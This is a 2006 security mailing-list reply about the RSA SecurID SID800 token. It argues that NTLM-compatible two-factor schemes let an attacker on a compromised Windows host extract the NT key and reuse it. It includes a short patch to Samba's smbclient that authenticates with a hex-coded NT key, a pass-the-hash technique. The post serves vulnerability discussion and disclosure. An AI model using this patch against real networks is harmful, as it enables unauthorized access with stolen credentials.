Re[3]: RSA SecurID SID800 Token vulnerable by design

[3APA3A <3APA3A@xxxxxxxxxxxxxxxx>]

Dear Brian Eaton,

--Saturday, September 9, 2006, 6:12:31 PM, you wrote to 3APA3A@xxxxxxxxxxxxxxxx:


BE> For web SSO in particular, accessing the token once is nearly as good
BE> as accessing it constantly.  The token will be used for the initial
BE> authentication, but normally a cookie will be used for session
BE> tracking.  An attacker who can sniff the token code can certainly
BE> steal the cookie as well.

BE> Two-factor  auth cannot be said to make accessing the network from a
BE> compromised  PC  "safe". That does not make two-factor auth useless.
BE> With  plain  passwords, once the attacker has the password, they can
BE> access  the  network  at will. With two-factor auth, they can access
BE> the network for a much more limited time span.

Network   is  compromised  as  long  as  attacker  keeps  control  under
compromised host regardless of authentication. And sometimes longer.

At  least for some 2-factor authentication schemas implementations under
Windows  (I'm not sure about this very implementation) situation may not
significantly  different from Web-based scenario. For compatibility with
NTLM authentication user's extended credentials are simply mapped to his
account  and it's possible to connect to network using user's NT key. In
standard  Windows  environment  NT  key  is  derived  from password. For
extended  authentication  schema  it can be set to some random value. NT
key  is  stored in memory of compromised host and thus can be extracted.
An  example patch for SAMBA smbclient to use hex-coded NT key instead of
password :

  --- md4.c.orig  2004-04-04 11:37:00.000000000 +0400
  +++ md4.c       2004-10-27 23:01:31.000000000 +0400
  @@ -130,6 +130,21 @@
          C = 0x98badcfe;
          D = 0x10325476;
  +
  +       if(n == 64){
  +        int j;
  +        unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
  +        for(j = 0; j<16; j++){
  +         if(!strchr(hexd, in[(j<<2)]))break;
  +         if(in[(j<<2)+1])break;
  +         if(!strchr(hexd, in[(j<<2)+2]))break;
  +         if(in[(j<<2)+3])break;
  +         out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
  +         out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
  +        }
  +        if(j == 16) return;
  +       }
  +
          while (n > 64) {
                  copy64(M, in);
                  mdfour64(M);

It  means,  if  authentication schema is NTLM-compatible (it must be for
compatibility with pre-Windows 2000 hosts and some network applications,
like  Outlook  Express),  attacker can use compromised account to access
network  resources  without  having  access  to  2-factor authentication
device.  How  long  he  can  retain  this  access  depends  on how often
account's  NT key is changed (usually with password change, but actually
depends on implementation of authentication system and may be never).

-- 
~/ZARAZA
http://www.security.nnov.ru/